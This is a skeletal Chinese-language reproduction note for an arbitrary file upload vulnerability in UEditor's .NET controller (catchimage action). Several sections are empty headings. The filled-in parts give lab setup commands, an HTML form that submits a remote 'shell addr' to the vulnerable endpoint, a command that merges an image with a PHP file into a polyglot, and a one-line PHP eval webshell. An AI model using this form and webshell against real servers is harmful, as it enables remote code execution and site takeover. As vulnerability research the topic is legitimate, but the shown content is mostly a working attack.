Ueditor任意文件上传漏洞
0x01漏洞简述
0x02 风险等级
0x03 影响版本
0x04 环境搭建
https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3
npm install -g grunt-cli
grunt --encode=utf8 --server=net
http://172.16.16.108:10000/ueditor/
0x05 漏洞复现
http://172.16.16.108:10000/ueditor/net/controller.ashx?action=catchimage
0x06 漏洞利用
<form
action="http://172.16.16.108/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
copy 1.jpg/b . 1.php 2.jpg
-
一句话木马:
<?php @eval($_POST['a']);?>
0x07 修复建议
net/App_Code/CrawlerHandler.cs